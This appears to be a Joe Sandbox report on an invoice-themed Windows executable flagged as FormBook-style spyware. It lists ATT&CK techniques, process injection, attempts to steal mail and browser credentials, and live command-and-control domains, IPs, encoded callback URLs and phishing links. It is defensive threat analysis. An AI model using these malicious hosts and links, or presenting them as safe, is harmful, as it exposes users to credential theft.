            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items14
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523775 Sample: ORIGINAL INVOICE COAU723073... Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 33 www.kartal-nakliyat.xyz 2->33 35 www.yippie.world 2->35 37 5 other IPs or domains 2->37 45 Suricata IDS alerts for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 8 other signatures 2->53 10 ORIGINAL INVOICE COAU7230734298.pdf.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 31 ORIGINAL INVOICE C...0734298.pdf.exe.log, ASCII 10->31 dropped 67 Injects a PE file into a foreign processes 10->67 14 ORIGINAL INVOICE COAU7230734298.pdf.exe 10->14         started        17 ORIGINAL INVOICE COAU7230734298.pdf.exe 10->17         started        signatures6 process7 signatures8 69 Maps a DLL or memory area into another process 14->69 19 fFUkGixTNm.exe 14->19 injected process9 signatures10 55 Found direct / indirect Syscall (likely to bypass EDR) 19->55 22 RpcPing.exe 13 19->22         started        process11 signatures12 57 Tries to steal Mail credentials (via file / registry access) 22->57 59 Tries to harvest and steal browser information (history, passwords, etc) 22->59 61 Modifies the context of a thread in another process (thread injection) 22->61 63 3 other signatures 22->63 25 fFUkGixTNm.exe 22->25 injected 29 firefox.exe 22->29         started        process13 dnsIp14 39 natroredirect.natrocdn.com 85.159.66.93, 56825, 56826, 56827 CIZGITR Turkey 25->39 41 www.sidqwdf.fun 185.106.176.204, 56829, 56830, 56831 AS_LYREG3FR United Kingdom 25->41 43 2 other IPs or domains 25->43 65 Found direct / indirect Syscall (likely to bypass EDR) 25->65 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            ORIGINAL INVOICE COAU7230734298.pdf.exe39%VirustotalBrowse
            ORIGINAL INVOICE COAU7230734298.pdf.exe29%ReversingLabs
            ORIGINAL INVOICE COAU7230734298.pdf.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            www.resellnexa.shop1%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            http://www.fontbureau.com0%URL Reputationsafe
            http://www.fontbureau.com/designersG0%URL Reputationsafe
            http://www.fontbureau.com/designersG0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            http://www.fontbureau.com/designers/?0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.fontbureau.com/designers?0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            http://www.fontbureau.com/designers0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fontbureau.com/designers80%URL Reputationsafe
            http://www.fonts.com0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.resellnexa.shop1%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
            http://www.ascendercorp.com/typedesigners.htmlru-ru0%VirustotalBrowse
            http://www.sidqwdf.fun/c6mm/2%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.sidqwdf.fun
            		185.106.176.204
            		truetrue
              		unknown
              www.resellnexa.shop
              		52.223.13.41
              		truetrueunknown
              yippie.world
              		3.33.130.190
              		truefalse
                		unknown
                natroredirect.natrocdn.com
                		85.159.66.93
                		truetrueunknown
                www.yippie.world
                		unknown
                		unknowntrue
                  		unknown
                  www.kartal-nakliyat.xyz
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.kartal-nakliyat.xyz/n8ew/true
                      		unknown
                      http://www.kartal-nakliyat.xyz/n8ew/?-L=YrE+HYcRTJ/OeXavXWmi0WsMxqp/Qj1TC8eaJJaWkX68lODBlWDwQ18bVJjKs/Cf7bGV7reziuqKeQkAFQFGt8cheHN72b7qcqvkvKEYShiE16kKqs7vQFQ=&5lFl=AhoHbVV8w8Fhovtrue
                        		unknown
                        http://www.sidqwdf.fun/c6mm/?-L=605lt7jFydoU7JlJmLmlR3MPZVvrIrf93PMCsOoFpo6XmjZ52y5IXJzTkSO6xf5k8c4UHFGKgBYSwhM4U1695pryhegOugHUsMzW6k0CmFF9ZZ6niG5/hdc=&5lFl=AhoHbVV8w8Fhovtrue
                          		unknown
                          http://www.yippie.world/pyhp/?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI=false
                            		unknown
                            http://www.resellnexa.shop/sfpe/true
                              		unknown
                              http://www.sidqwdf.fun/c6mm/trueunknown
                              http://www.resellnexa.shop/sfpe/?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhovtrue
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabRpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                http://www.fontbureau.comORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersGORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/?ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/bTheORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoRpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                http://www.fontbureau.com/designers?ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.tiro.comORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.goodfont.co.krORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.ecosia.org/newtab/RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.comlORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.resellnexa.shopfFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                http://www.sajatypeworks.comORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://ac.ecosia.org/autocomplete?q=RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/cTheORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-user.htmlORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.ascendercorp.com/typedesigners.htmlru-ruORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693090420.0000000005A07000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                http://www.galapagosdesign.com/DPleaseORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers8ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fonts.comORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sandoll.co.krORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sakkal.comORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                52.223.13.41
                                		www.resellnexa.shopUnited States
                                		8987AMAZONEXPANSIONGBtrue
                                185.106.176.204
                                		www.sidqwdf.funUnited Kingdom
                                		204212AS_LYREG3FRtrue
                                3.33.130.190
                                		yippie.worldUnited States
                                		8987AMAZONEXPANSIONGBfalse
                                85.159.66.93
                                		natroredirect.natrocdn.comTurkey
                                		34619CIZGITRtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1523775
                                Start date and time:2024-10-02 02:04:08 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 13s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:2
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:ORIGINAL INVOICE COAU7230734298.pdf.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@9/2@5/4
                                EGA Information:
                                • Successful, ratio: 80%
                                HCA Information:
                                • Successful, ratio: 96%
                                • Number of executed functions: 108
                                • Number of non-executed functions: 309
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target fFUkGixTNm.exe, PID 3492 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                20:04:59API Interceptor1x Sleep call for process: ORIGINAL INVOICE COAU7230734298.pdf.exe modified
                                20:06:32API Interceptor141955x Sleep call for process: RpcPing.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                52.223.13.41z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                • www.longfilsalphonse.net/iq05/
                                PO23100072.exeGet hashmaliciousFormBookBrowse
                                • www.timetime.store/hvm1/
                                RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                • www.insicilia.today/2fpq/
                                PO-000001488.exeGet hashmaliciousFormBookBrowse
                                • www.longfilsalphonse.net/8q1d/
                                RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                • www.tonesandtribes.shop/ypts/
                                2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                • www.insicilia.today/au5k/?mnShvP=RwVoEqK3tsH8ZJEwHaweRJTJSS8U5JHNbZExgB0fwJs27r15neVJV7QWQSSA6uFH9LK+YaA27MOdk5i2aapjRf+IeXUW+G7fHeqN3cIB/yUaJyZ7B1Ave/w=&Cbj=nB9LWdWpMT7tUBt
                                DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                • www.longfilsalphonse.net/rx9p/
                                SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                • www.insicilia.today/2fpq/
                                SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                • www.insicilia.today/au5k/?RD4=RwVoEqK3tsH8ZJEwHaweRJTJSS8U5JHNbZExgB0fwJs27r15neVJV7QWQSSA6uFH9LK+YaA27MOdk5i2aapjRf+IeXUW+G7fHeqN3cIB/yUaJyZ7B1Ave/w=&VzA=dz5HvTSP4ZdlFHDP
                                file.exeGet hashmaliciousFormBookBrowse
                                • www.longfilsalphonse.net/rx9p/

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                natroredirect.natrocdn.comArrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                Quote #260924.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                Quote #270924.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                rAGROTIS10599242024.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93
                                oO3ZmCAeLQ.exeGet hashmaliciousFormBookBrowse
                                • 85.159.66.93

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                AS_LYREG3FRNOAH CRYPT.exeGet hashmaliciousFormBookBrowse
                                • 185.106.176.241
                                Payment Swift-67654.pdf.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 185.106.176.241
                                #U0423#U0432#U0435#U0434#U043e#U043c#U043b#U0435#U043d#U0438#U0435 #U2116 24357.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 185.106.176.241
                                RFQaswab46347858.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 185.106.176.241
                                Payment Advice - Advice Ref[BIBBC2023189].exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 185.106.176.241
                                Payment details.scr.exeGet hashmaliciousFormBookBrowse
                                • 185.106.176.241
                                AWB# 6290868304.docx.docGet hashmaliciousFormBookBrowse
                                • 185.106.176.241
                                HQE5DRlPBT.exeGet hashmaliciousFormBookBrowse
                                • 185.106.176.241
                                SHIPMENT DOCUMENT.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 185.106.176.241
                                New PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 185.106.178.60
                                AMAZONEXPANSIONGBhttp://www.johnhdaniel.comGet hashmaliciousUnknownBrowse
                                • 52.223.40.198
                                https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                • 52.223.40.198
                                Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                • 52.223.40.198
                                https://wetransfer.com/downloads/fc718a7028ccd1e273879a61c0883fe420241001145250/8110e2eb5f5a56cc2015d1b3243d9b3120241001145309/33d289?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgridGet hashmaliciousHTMLPhisherBrowse
                                • 52.223.40.198
                                ORDER ENQUIRY.exeGet hashmaliciousFormBookBrowse
                                • 3.33.130.190
                                http://www.aieov.com/setup.exeGet hashmaliciousUnknownBrowse
                                • 3.33.243.145
                                https://www.afghanhayatrestaurant.com.au/Get hashmaliciousUnknownBrowse
                                • 3.33.243.145
                                https://u47113775.ct.sendgrid.net/ls/click?upn=u001.NLjCc2NrF5-2Fl1RHefgLH74dDCI-2FlQUMQCuknF0akr34-3DPZ74_Bz-2FoIC9YMuvgy8ZsoekpZ-2Fn96y0OCAueT5LjwQn-2FX25AbFWdd2iGOJMfOUDymLwSDnjLWUuKOfyExMHrLPQc6sWuvBEF4PT9PwlcB-2BK9NQmoQucfLOeGSzPQg4J-2Bvn2C-2FT7DBGI3L6HQml9TPdefbzANw58o8IwtiN3AMNw21dRhcIy1JE5InQL6ZhzyniB-2FPrKB2Vn9uUJ7Mm1QrvUZh95-2FIqg1tkHnn-2FLCgLCOHUCdp1zwu5x-2Fprfv3kPHwI33RA9-2FJGY9xYPl-2BGH4uHP30vXeaFOwuVkWjx1bpQcAiato1uxhbL8AJAqpgT-2Bg5yQp7xXBACsCORIJr0VehkYFdFdFkgZPx7KSQblwloMm5OUc-2B9bb1d0siCBq5u36Pp2iCgmhq5PmipxmWr1HvrLZkdUUXJjpaRdjjEopb-2Fhw3b-2BUOpmNbUIJywjWyMBcUA9ScKtkpotTga2qo5ZaX-2B7AVyqz8KXtUfTb8SopobzuOWPiU-2BhBa8i7lRIGGQBQZmYU1TWv5mQ8uRPPf-2FWdH9RREF8cMLDET4k24yu8dJdqteeATx8Jfw8MWOWehX6ZTxJWGswooAVOvW116fDJmFNO-2F-2BecR-2Fd9NmRwCYnnK4Bh3IM-3DGet hashmaliciousHTMLPhisherBrowse
                                • 3.33.220.150
                                https://content.app-us1.com/1REPZ7/2024/09/30/ff91983f-ef4d-4288-b1e8-8d1ab94f757b.pdfGet hashmaliciousHTMLPhisherBrowse
                                • 3.33.220.150
                                https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg=Get hashmaliciousUnknownBrowse
                                • 3.33.220.150
                                AMAZONEXPANSIONGBhttp://www.johnhdaniel.comGet hashmaliciousUnknownBrowse
                                • 52.223.40.198
                                https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                • 52.223.40.198
                                Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                • 52.223.40.198
                                https://wetransfer.com/downloads/fc718a7028ccd1e273879a61c0883fe420241001145250/8110e2eb5f5a56cc2015d1b3243d9b3120241001145309/33d289?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgridGet hashmaliciousHTMLPhisherBrowse
                                • 52.223.40.198
                                ORDER ENQUIRY.exeGet hashmaliciousFormBookBrowse
                                • 3.33.130.190
                                http://www.aieov.com/setup.exeGet hashmaliciousUnknownBrowse
                                • 3.33.243.145
                                https://www.afghanhayatrestaurant.com.au/Get hashmaliciousUnknownBrowse
                                • 3.33.243.145
                                https://u47113775.ct.sendgrid.net/ls/click?upn=u001.NLjCc2NrF5-2Fl1RHefgLH74dDCI-2FlQUMQCuknF0akr34-3DPZ74_Bz-2FoIC9YMuvgy8ZsoekpZ-2Fn96y0OCAueT5LjwQn-2FX25AbFWdd2iGOJMfOUDymLwSDnjLWUuKOfyExMHrLPQc6sWuvBEF4PT9PwlcB-2BK9NQmoQucfLOeGSzPQg4J-2Bvn2C-2FT7DBGI3L6HQml9TPdefbzANw58o8IwtiN3AMNw21dRhcIy1JE5InQL6ZhzyniB-2FPrKB2Vn9uUJ7Mm1QrvUZh95-2FIqg1tkHnn-2FLCgLCOHUCdp1zwu5x-2Fprfv3kPHwI33RA9-2FJGY9xYPl-2BGH4uHP30vXeaFOwuVkWjx1bpQcAiato1uxhbL8AJAqpgT-2Bg5yQp7xXBACsCORIJr0VehkYFdFdFkgZPx7KSQblwloMm5OUc-2B9bb1d0siCBq5u36Pp2iCgmhq5PmipxmWr1HvrLZkdUUXJjpaRdjjEopb-2Fhw3b-2BUOpmNbUIJywjWyMBcUA9ScKtkpotTga2qo5ZaX-2B7AVyqz8KXtUfTb8SopobzuOWPiU-2BhBa8i7lRIGGQBQZmYU1TWv5mQ8uRPPf-2FWdH9RREF8cMLDET4k24yu8dJdqteeATx8Jfw8MWOWehX6ZTxJWGswooAVOvW116fDJmFNO-2F-2BecR-2Fd9NmRwCYnnK4Bh3IM-3DGet hashmaliciousHTMLPhisherBrowse
                                • 3.33.220.150
                                https://content.app-us1.com/1REPZ7/2024/09/30/ff91983f-ef4d-4288-b1e8-8d1ab94f757b.pdfGet hashmaliciousHTMLPhisherBrowse
                                • 3.33.220.150
